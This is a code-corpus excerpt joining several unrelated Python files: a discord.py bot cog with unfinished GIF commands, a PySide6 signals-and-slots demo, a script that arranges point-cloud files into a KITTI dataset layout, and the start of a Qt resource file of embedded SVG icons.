@commands.cooldown(1,30,BucketType.user)
@commands.group(name="tenor",invoke_without_command=True)
async def tenor(self,ctx,*,args=None):
if args:
results = await self.client.loop.run_in_executor(None, tenor_client.search(args, safesearch=True, limit=10))
print(results)
#going to be swapping to an async Tenorgiphy soon lol. This is true :D
if args is None:
await ctx.send("You can't search for nothing")
@tenor.command(help="work in progress",name="shuffle")
async def tenor_random(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor shuffle")
@commands.command(help="work in progress",aliases=["tenor-shuffle"])
async def tenor_shuffle(self,ctx,*,args):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor shuffle")
@commands.group(name="giphy",invoke_without_command=True)
async def giphy(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor")
@giphy.command(help="work in progress",name="shuffle")
async def giphy_random(self,ctx,*,args=None):
    """Placeholder ``giphy shuffle`` subcommand; not implemented yet."""
    if args:
        await ctx.send("WIP")
    if args is None:
        await ctx.send("That doesn't have any value.")
        # NOTE(review): indentation lost in dump; assumed inside the None branch.
        await ctx.send("giphy shuffle")
@commands.command(help="work in progress",aliases=["giphy-shuffle"])
async def giphy_shuffle(self,ctx,*,args):
    """Placeholder standalone ``giphy_shuffle`` command; not implemented yet.

    NOTE(review): ``args`` has no default, so the ``args is None`` branch is
    presumably unreachable via normal invocation -- verify against discord.py
    argument-parsing behavior.
    """
    if args:
        await ctx.send("WIP")
    if args is None:
        await ctx.send("That doesn't have any value.")
        # NOTE(review): indentation lost in dump; assumed inside the None branch.
        await ctx.send("giphy shuffle")
async def cog_command_error(self, ctx, error):
    """Cog-wide fallback error reporter.

    When the failing command defines its own error handler, defer to it and
    do nothing; otherwise echo the error object back to the channel.
    """
    has_local_handler = ctx.command and ctx.command.has_error_handler()
    if not has_local_handler:
        await ctx.send(error)
def setup(client):
    """Extension entry point used by discord.py's extension loader; registers
    the ``Order`` cog on the bot."""
    client.add_cog(Order(client))
44685ac8d733d07256270373907d763751c70fec | 1,567 | py | Python | gui_pyside6/ejemplo_cuatro/manejo_eventos.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | gui_pyside6/ejemplo_cuatro/manejo_eventos.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | gui_pyside6/ejemplo_cuatro/manejo_eventos.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | # signals (eventos) y slots (metodos que procesan los eventos)
from PySide6.QtWidgets import QApplication, QMainWindow, QPushButton, QWidget, QVBoxLayout, QHBoxLayout, QLabel, QLineEdit, QMessageBox
from PySide6.QtCore import QSize
import sys
class VentanaPrincipal(QMainWindow):
    """Main window demonstrating Qt signals and slots.

    A single checkable QPushButton is the central widget; its ``clicked``
    signal is connected to two slots: one records the checked state and the
    other prints it.
    """

    def __init__(self):
        super().__init__()
        self.setWindowTitle("Signals y Slots")
        # Create the button and make it checkable so ``clicked`` delivers the
        # toggled state (the checked flag starts out False).
        boton = QPushButton("Click Aqui")
        boton.setCheckable(True)
        # Connect two slots to the same signal. NOTE(review): _evento_click
        # reads self.boton_checado, which only _evento_chequeado sets -- this
        # assumes Qt invokes these direct connections in connection order, so
        # _evento_chequeado must run first. Confirm if the connections are
        # ever reordered.
        boton.clicked.connect(self._evento_chequeado)
        boton.clicked.connect(self._evento_click)
        # Publish the button as the central widget of the window.
        self.setCentralWidget(boton)

    def _evento_click(self):
        # Slot for ``clicked``: report the checked state captured by
        # _evento_chequeado (see the ordering note in __init__).
        print("evento click: ", self.boton_checado)
        print("evento click")

    def _evento_chequeado(self, chequeado):
        # Slot for ``clicked``: remember the button's current checked state.
        self.boton_checado = chequeado
        print("evento chequeado: ", self.boton_checado)
if __name__ == '__main__':
    # Standard Qt bootstrap: build the application, show the window, and hand
    # control to the event loop until the window is closed.
    app = QApplication(sys.argv)
    ventana = VentanaPrincipal()
    ventana.show()
    # PySide6 (Qt 6) renamed QApplication.exec_() to exec(); the underscored
    # form is only a deprecated compatibility alias.
    sys.exit(app.exec())
44689571888025e3ab953e020afce0ebacd74326 | 2,650 | py | Python | util/format_files.py | tammam1998/PCDet | ad5b24934fb35892ff073e364dab6acadbd3f135 | [
"Apache-2.0"
] | null | null | null | util/format_files.py | tammam1998/PCDet | ad5b24934fb35892ff073e364dab6acadbd3f135 | [
"Apache-2.0"
] | null | null | null | util/format_files.py | tammam1998/PCDet | ad5b24934fb35892ff073e364dab6acadbd3f135 | [
"Apache-2.0"
] | null | null | null | from utils import *
from sys import argv
import os
# Directory containing this script, used as the root for the default output
# path below. NOTE(review): "DEFUALT" is a typo, but the name is referenced
# later in the file, so renaming it needs a coordinated change.
DEFUALT_PATH = os.path.realpath(__file__).replace("/format_files.py", "")
def make_image_dir(to_path, filenames):
    """Create ``<to_path>/image_2`` and copy the placeholder ``sample.png``
    into it once per frame name (as ``<name>.png``) to satisfy the KITTI
    directory layout.

    ``sample.png`` is resolved relative to the current working directory --
    presumably the script's own directory; confirm before running elsewhere.
    Uses ``shutil.copy`` instead of ``os.system("cp ...")`` so paths with
    spaces work and copy failures raise instead of being silently ignored.
    """
    import shutil

    image_dir = os.path.join(to_path, "image_2")
    os.makedirs(image_dir)
    for name in filenames:
        shutil.copy("sample.png", os.path.join(image_dir, name + ".png"))
def make_calib_dir(to_path, filenames):
    """Create ``<to_path>/calib`` and copy the placeholder ``calib.txt`` into
    it once per frame name (as ``<name>.txt``) to satisfy the KITTI layout.

    ``calib.txt`` is resolved relative to the current working directory --
    presumably the script's own directory; confirm before running elsewhere.
    Uses ``shutil.copy`` instead of ``os.system("cp ...")`` so paths with
    spaces work and copy failures raise instead of being silently ignored.
    """
    import shutil

    calib_dir = os.path.join(to_path, "calib")
    os.makedirs(calib_dir)
    for name in filenames:
        shutil.copy("calib.txt", os.path.join(calib_dir, name + ".txt"))
def make_velo_dir(to_path, bin_files):
    """Create ``<to_path>/velodyne`` and copy each point-cloud ``.bin`` file
    into it under its original basename, matching the KITTI layout.

    Uses ``shutil.copy`` instead of ``os.system("cp ...")`` so paths with
    spaces work and copy failures raise instead of being silently ignored.
    """
    import shutil

    velo_dir = os.path.join(to_path, "velodyne")
    os.makedirs(velo_dir)
    for bin_file in bin_files:
        name = os.path.basename(bin_file)
        shutil.copy(bin_file, os.path.join(velo_dir, name))
def create_image_set(to_path, filenames):
    """Write the KITTI ``ImageSets`` split files under ``to_path``.

    ``test.txt`` receives every name in *filenames*, sorted, one per line;
    ``train.txt`` and ``val.txt`` are created empty. The original left the
    train/val file handles open; all files are now opened via ``with`` so
    they are closed deterministically.
    """
    set_dir = os.path.join(to_path, "ImageSets")
    os.makedirs(set_dir)
    test_file = os.path.join(set_dir, "test.txt")
    with open(test_file, "w") as f:
        for name in sorted(filenames):
            f.write(str(name) + "\n")
    # train/val splits are intentionally empty for this (test-only) layout.
    for empty_split in ("train.txt", "val.txt"):
        with open(os.path.join(set_dir, empty_split), "w"):
            pass
def main(from_path, to_path, split="testing"):
    """Convert a directory of ``.bin`` point clouds into a KITTI-style tree.

    Scans *from_path* once for ``.bin`` files, writes the ImageSets split
    files under *to_path*, then fills ``<to_path>/<split>`` with image_2,
    calib and velodyne directories.

    Fixes two issues in the original: ``os.listdir`` was called twice, and
    ``.replace(".bin", "")`` removed the substring anywhere in the name
    rather than only stripping the suffix.
    """
    bin_names = [f for f in os.listdir(from_path) if f.endswith(".bin")]
    filenames = [f[:-len(".bin")] for f in bin_names]
    bin_files = [os.path.join(from_path, f) for f in bin_names]
    create_image_set(to_path, filenames)
    sub_dir = "testing" if split == "testing" else "training"
    to_path = os.path.join(to_path, sub_dir)
    make_image_dir(to_path, filenames)
    make_calib_dir(to_path, filenames)
    make_velo_dir(to_path, bin_files)
if __name__ == "__main__":
    # Usage: format_files.py FROM_DIR [TO_DIR]
    # FROM_DIR holds the .bin point clouds; TO_DIR defaults to data/kitti
    # next to this script and is wiped before regeneration.
    if len(argv) > 1:
        import shutil

        from_path = argv[1]
        to_path = os.path.join(DEFUALT_PATH, "data/kitti") if len(argv) == 2 else argv[2]
        # Replaces os.system("rm -r ..."), which broke on paths with spaces;
        # ignore_errors mirrors the old behavior of ignoring the exit status
        # (e.g. when the directory does not exist yet).
        shutil.rmtree(to_path, ignore_errors=True)
    else:
        raise Exception("please include from_dir and to_dir in args")
    main(from_path, to_path)
446910272f530e7a9c174ed37e4268b3d0995159 | 29,890 | py | Python | src/rc_icons.py | lmdu/dockey | a8ae34c780c952cb26270a173de08897b34c7252 | [
"MIT"
] | null | null | null | src/rc_icons.py | lmdu/dockey | a8ae34c780c952cb26270a173de08897b34c7252 | [
"MIT"
] | null | null | null | src/rc_icons.py | lmdu/dockey | a8ae34c780c952cb26270a173de08897b34c7252 | [
"MIT"
] | null | null | null | # Resource object code (Python 3)
# Created by: object code
# Created by: The Resource Compiler for Qt version 6.3.0
# WARNING! All changes made in this file will be lost!
from PySide6 import QtCore
qt_resource_data = b"\
\x00\x00\x02\xd8\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<g>\
\x0d\x0a\x09<path d=\x22M9,4\
c2.8,0,5,2.2,5,5\
s-2.2,5-5,5s-5-2\
.2-5-5S6.2,4,9,4\
M9,3C5.7,3,3,5.\
7,3,9s2.7,6,6,6s\
6-2.7,6-6S12.3,3\
,9,3L9,3z\x22/>\x0d\x0a</\
g>\x0d\x0a<path d=\x22M15\
.9,8h1.6C17.8,8,\
18,8.2,18,8.5v9c\
0,0.3-0.2,0.5-0.\
5,0.5h-9C8.2,18,\
8,17.8,8,17.5v-1\
.6c-0.3,0-0.7-0.\
1-1-0.2v1.8\x0d\x0a\x09C7\
,18.3,7.7,19,8.5\
,19l0,0h9c0.8,0,\
1.5-0.7,1.5-1.5l\
0,0v-9C19,7.7,18\
.3,7,17.5,7h-1.8\
C15.8,7.3,15.9,7\
.7,15.9,8z\x22/>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x03\x13\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M9,12c0-0.\
3,0.2-0.5,0.5-0.\
5h3c0.3,0,0.5,0.\
2,0.5,0.5s-0.2,0\
.5-0.5,0.5h-3C9.\
2,12.5,9,12.3,9,\
12z M6.9,7.1\x0d\x0a\x09C\
6.7,7,6.3,7,6.1,\
7.1S6,7.7,6.1,7.\
9l0,0l1.6,1.6l-1\
.6,1.6c-0.2,0.2-\
0.2,0.5,0,0.7s0.\
5,0.2,0.7,0l2-2C\
9,9.7,9,9.3,8.9,\
9.1l0,0\x0d\x0a\x09L6.9,7\
.1z\x22/>\x0d\x0a<path d=\
\x22M5,4C3.9,4,3,4.\
9,3,6v10c0,1.1,0\
.9,2,2,2h12c1.1,\
0,2-0.9,2-2V6c0-\
1.1-0.9-2-2-2H5z\
M17,5c0.6,0,1,0\
.4,1,1v10\x0d\x0a\x09c0,0\
.6-0.4,1-1,1H5c-\
0.6,0-1-0.4-1-1V\
6c0-0.6,0.4-1,1-\
1H17z\x22/>\x0d\x0a</svg>\
\x0d\x0a\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#DC3545;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03$\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 focusabl\
e=\x22false\x22 xmlns=\
\x22http://www.w3.o\
rg/2000/svg\x22 xml\
ns:xlink=\x22http:/\
/www.w3.org/1999\
/xlink\x22\x0d\x0a\x09 x=\x220p\
x\x22 y=\x220px\x22 viewB\
ox=\x220 0 512 512\x22\
style=\x22enable-b\
ackground:new 0 \
0 512 512;\x22 xml:\
space=\x22preserve\x22\
>\x0d\x0a<style type=\x22\
text/css\x22>\x0d\x0a\x09.st\
0{fill:#2A7400;s\
troke:#000000;st\
roke-width:5;str\
oke-miterlimit:1\
0;}\x0d\x0a\x09.st1{fill:\
#FFFFFF;}\x0d\x0a</sty\
le>\x0d\x0a<path class\
=\x22st0\x22 d=\x22M256,0\
C114.6,0,0,114.6\
,0,256s114.6,256\
,256,256s256-114\
.6,256-256S397.4\
,0,256,0z\x22/>\x0d\x0a<p\
ath class=\x22st1\x22 \
d=\x22M208,335.99V1\
52c0-13.25-10.75\
-24-24-24h0c-13.\
25,0-24,10.75-24\
,24v183.99v23c0,\
13.81,11.19,25,2\
5,25h23h120.06\x0d\x0a\
\x09c13.25,0,24-10.\
75,24-24v0c0-13.\
25-10.75-24-24-2\
4H208z\x22/>\x0d\x0a</svg\
>\x0d\x0a\
\x00\x00\x03\xcb\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 26.2.1,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M16.5,4C15\
.7,4,15,4.7,15,5\
.5S15.7,7,16.5,7\
C17.3,7,18,6.3,1\
8,5.5S17.3,4,16.\
5,4z M14,5.5C14,\
4.1,15.1,3,16.5,\
3\x0d\x0a\x09C17.9,3,19,4\
.1,19,5.5C19,6.9\
,17.9,8,16.5,8c-\
0.7,0-1.4-0.3-1.\
9-0.9l-6.7,3.1c0\
.2,0.5,0.2,1,0,1\
.5l6.7,3.1c0.9-1\
,2.5-1.2,3.5-0.3\
\x0d\x0a\x09c1,0.9,1.2,2.\
5,0.3,3.5s-2.5,1\
.2-3.5,0.3c-0.8-\
0.7-1.1-1.7-0.8-\
2.6l-6.7-3.1c-0.\
9,1-2.5,1.2-3.5,\
0.3s-1.2-2.5-0.3\
-3.5\x0d\x0a\x09s2.5-1.2,\
3.5-0.3c0.1,0.1,\
0.2,0.2,0.3,0.3l\
6.7-3.1C14,6,14,\
5.8,14,5.5z M5.5\
,9.5C4.7,9.5,4,1\
0.2,4,11s0.7,1.5\
,1.5,1.5S7,11.8,\
7,11\x0d\x0a\x09S6.3,9.5,\
5.5,9.5z M16.5,1\
5c-0.8,0-1.5,0.7\
-1.5,1.5c0,0.8,0\
.7,1.5,1.5,1.5c0\
.8,0,1.5-0.7,1.5\
-1.5C18,15.7,17.\
3,15,16.5,15z\x22/>\
\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xc7\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 20 20\x22 sty\
le=\x22enable-backg\
round:new 0 0 20\
20;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<st\
yle type=\x22text/c\
ss\x22>\x0d\x0a\x09.st0{fill\
-rule:evenodd;cl\
ip-rule:evenodd;\
}\x0d\x0a</style>\x0d\x0a<pa\
th class=\x22st0\x22 d\
=\x22M8.5,14c3,0,5.\
5-2.5,5.5-5.5S11\
.5,3,8.5,3l0,0C5\
.5,3,3,5.5,3,8.5\
S5.5,14,8.5,14z \
M15,8.5c0,3.6-2.\
9,6.5-6.5,6.5\x0d\x0a\x09\
S2,12.1,2,8.5S4.\
9,2,8.5,2S15,4.9\
,15,8.5z\x22/>\x0d\x0a<pa\
th d=\x22M12.3,13.7\
c0,0,0.1,0.1,0.1\
,0.1l3.9,3.8c0.4\
,0.4,1,0.4,1.4,0\
s0.4-1,0-1.4l-3.\
9-3.9c0,0-0.1-0.\
1-0.1-0.1\x0d\x0a\x09C13.\
3,12.9,12.9,13.3\
,12.3,13.7L12.3,\
13.7z\x22/>\x0d\x0a<path \
class=\x22st0\x22 d=\x22M\
8.5,5C8.8,5,9,5.\
2,9,5.5V8h2.5C11\
.8,8,12,8.2,12,8\
.5S11.8,9,11.5,9\
H9v2.5C9,11.8,8.\
8,12,8.5,12S8,11\
.8,8,11.5\x0d\x0a\x09V9H5\
.5C5.2,9,5,8.8,5\
,8.5S5.2,8,5.5,8\
H8V5.5C8,5.2,8.2\
,5,8.5,5z\x22/>\x0d\x0a</\
svg>\x0d\x0a\
\x00\x00\x02\xc7\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M11.2,4.1c\
-0.1,0-0.3,0-0.4\
,0l-6,2.4L11,9l6\
.2-2.5L11.2,4.1z\
M18,7.2l-6.5,2.\
6v7.9l6.5-2.6V7.\
2L18,7.2z M10.5,\
17.8V9.8\x0d\x0a\x09L4,7.\
2v7.9C4,15.2,10.\
5,17.8,10.5,17.8\
z M10.4,3.2c0.4-\
0.1,0.8-0.1,1.1,\
0L18.7,6C18.9,6.\
1,19,6.3,19,6.5v\
8.7c0,0.4-0.2,0.\
8-0.6,0.9\x0d\x0a\x09L11.\
2,19c-0.1,0-0.3,\
0-0.4,0l-7.2-2.9\
C3.2,15.9,3,15.6\
,3,15.2V6.5C3,6.\
3,3.1,6.1,3.3,6L\
10.4,3.2z\x22/>\x0d\x0a</\
svg>\x0d\x0a\
\x00\x00\x08\x98\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 256 256\x22 s\
tyle=\x22enable-bac\
kground:new 0 0 \
256 256;\x22 xml:sp\
ace=\x22preserve\x22>\x0d\
\x0a<style type=\x22te\
xt/css\x22>\x0d\x0a\x09.st0{\
fill:none;}\x0d\x0a\x09.s\
t1{display:none;\
}\x0d\x0a\x09.st2{display\
:inline;fill:non\
e;}\x0d\x0a\x09.st3{displ\
ay:inline;fill:#\
FFFFFF;}\x0d\x0a\x09.st4{\
fill:#39B54A;}\x0d\x0a\
</style>\x0d\x0a<path \
class=\x22st0\x22 d=\x22M\
256,128\x22/>\x0d\x0a<pat\
h class=\x22st0\x22 d=\
\x22M128,256C57.3,2\
56,0,198.7,0,128\
S57.3,0,128,0\x22/>\
\x0d\x0a<g class=\x22st1\x22\
>\x0d\x0a\x09<path class=\
\x22st2\x22 d=\x22M129.5,\
202.9c42.2,2.6,7\
7.1-32.2,74.4-74\
.4c-2.3-35.3-31.\
1-63.6-66.4-65.3\
C113.7,62,92.4,7\
2.8,78.9,90l52.1\
,52\x0d\x0a\x09\x09L78.9,89.\
9c-9.7,12.4-15.4\
,28.2-14.8,45.3C\
65.2,171.1,93.7,\
200.6,129.5,202.\
9z\x22/>\x0d\x0a\x09<path cl\
ass=\x22st3\x22 d=\x22M13\
5.8,33c-31.4-0.5\
-58.5,12.4-77.2,\
34.5L84,61l-4.1,\
27.9c13.5-17.2,3\
3.8-26.9,57.6-25\
.8\x0d\x0a\x09\x09c35.3,1.7,\
64.1,30,66.4,65.\
3c2.7,42.3-32.1,\
77.1-74.3,74.4c-\
35.8-2.2-64.4-31\
.8-65.5-67.6c-0.\
4-13.1,2.8-25.3,\
8.6-35.9\x0d\x0a\x09\x09c3.3\
-5.9,2.4-13.3-2.\
4-18l0,0c-7.1-7.\
1-19-5.3-23.8,3.\
4c-8,14.5-12.6,3\
1.3-12.4,49.2c0.\
5,54.9,45.8,99.6\
,100.7,99.1\x0d\x0a\x09\x09c\
55.6-0.4,100.3-4\
6.1,99.3-102C232\
.9,77.5,189.3,34\
,135.8,33z\x22/>\x0d\x0a<\
/g>\x0d\x0a<g>\x0d\x0a\x09<path\
class=\x22st4\x22 d=\x22\
M-212,148.3\x22/>\x0d\x0a\
\x09<path class=\x22st\
4\x22 d=\x22M-212,125.\
3\x22/>\x0d\x0a</g>\x0d\x0a<g>\x0d\
\x0a\x09<path class=\x22s\
t4\x22 d=\x22M128,158.\
5c-18,0-32.5-15.\
8-30.3-34.3c1.7-\
14,13-25.1,26.9-\
26.6c11.7-1.2,22\
.2,4.1,28.2,12.8\
\x0d\x0a\x09\x09c2.6,3.7,6.8\
,6,11.3,6l82.6,0\
c3,0,5.4-2.6,5-5\
.6C243.5,50,191.\
3,3,128,3C73.7,3\
,27.6,37.6,10.3,\
85.8c-5.4,14.9,5\
.8,30.7,21.7,30.\
7\x0d\x0a\x09\x09h0c9.7,0,18\
.3-6.1,21.7-15.2\
C64.7,70.7,94.2,\
48.8,128.3,49c23\
.9,0.1,45.3,10.8\
,59.7,27.7c6.6,7\
.7,3.9,19.7-5.5,\
23.6l0,0\x0d\x0a\x09\x09c-6.\
1,2.6-13.1,0.8-1\
7.4-4.2C156.3,85\
.7,142.9,79,128,\
79c-26.5,0-48.1,\
21.1-49,47.4c-0.\
9,27.2,21.4,50.4\
,48.6,50.6\x0d\x0a\x09\x09c1\
5.2,0.1,28.7-6.7\
,37.8-17.4c4.2-5\
,11.2-6.5,17.2-3\
.9l0,0c9.2,3.9,1\
2.2,15.7,5.7,23.\
3c-14.5,17.1-36.\
1,28-60.4,28\x0d\x0a\x09\x09\
c-34.2,0-63.3-21\
.7-74.3-52.2c-3.\
3-9.2-11.9-15.3-\
21.7-15.3h0c-15.\
9,0-27,15.7-21.7\
,30.6C27.5,218.4\
,73.7,253,128,25\
3\x0d\x0a\x09\x09c63.3,0,115\
.5-47,123.9-107.\
9c0.4-3-2-5.6-5-\
5.6h-82.6c-4.5,0\
-8.6,2.2-11.2,5.\
8C147.6,153.3,13\
8.4,158.5,128,15\
8.5z\x22/>\x0d\x0a</g>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x02\xfc\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M11,9.5c0.\
3,0,0.5,0.2,0.5,\
0.5v1.5H13c0.3,0\
,0.5,0.2,0.5,0.5\
s-0.2,0.5-0.5,0.\
5h-1.5V14c0,0.3-\
0.2,0.5-0.5,0.5\x0d\
\x0a\x09s-0.5-0.2-0.5-\
0.5v-1.5H9c-0.3,\
0-0.5-0.2-0.5-0.\
5s0.2-0.5,0.5-0.\
5h1.5V10C10.5,9.\
7,10.7,9.5,11,9.\
5z\x22/>\x0d\x0a<path d=\x22\
M17,7.5V17c0,1.1\
-0.9,2-2,2H7c-1.\
1,0-2-0.9-2-2V5c\
0-1.1,0.9-2,2-2h\
5.5L17,7.5z M14,\
7.5c-0.8,0-1.5-0\
.7-1.5-1.5V4H7\x0d\x0a\
\x09C6.4,4,6,4.4,6,\
5v12c0,0.6,0.4,1\
,1,1h8c0.6,0,1-0\
.4,1-1V7.5H14z\x22/\
>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x02\xa0\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 26.2.1,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M9,8.5C9,9\
.3,8.3,10,7.5,10\
S6,9.3,6,8.5S6.7\
,7,7.5,7S9,7.7,9\
,8.5z\x22/>\x0d\x0a<path \
d=\x22M5,4C3.9,4,3,\
4.9,3,6v10c0,1.1\
,0.9,2,2,2h12c1.\
1,0,2-0.9,2-2V6c\
0-1.1-0.9-2-2-2C\
17,4,5,4,5,4z M1\
7,5c0.6,0,1,0.4,\
1,1v6.5\x0d\x0a\x09l-3.8-\
1.9c-0.2-0.1-0.4\
-0.1-0.6,0.1l-3.\
7,3.7l-2.7-1.8c-\
0.2-0.1-0.5-0.1-\
0.6,0.1L4,15V6c0\
-0.6,0.4-1,1-1H1\
7z\x22/>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x04\x88\
<\
?xml version=\x221.\
0\x22 encoding=\x22iso\
